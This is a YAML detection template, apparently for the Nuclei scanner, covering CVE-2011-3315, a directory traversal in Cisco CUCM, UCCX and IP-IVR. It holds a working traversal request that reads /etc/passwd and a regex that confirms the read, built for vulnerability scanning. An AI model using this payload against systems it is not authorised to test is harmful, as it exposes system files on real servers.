34 lines
1.1 KiB
YAML
34 lines
1.1 KiB
YAML
id: CVE-2011-3315
|
|
|
|
info:
|
|
name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
|
|
author: daffainfo
|
|
severity: high
|
|
description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express
|
|
(aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers
|
|
to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/36256
|
|
classification:
|
|
cve-id: CVE-2011-3315
|
|
remediation: Upgrade to a supported version.
|
|
tags: cve,cve2011,lfi,cisco
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/18
|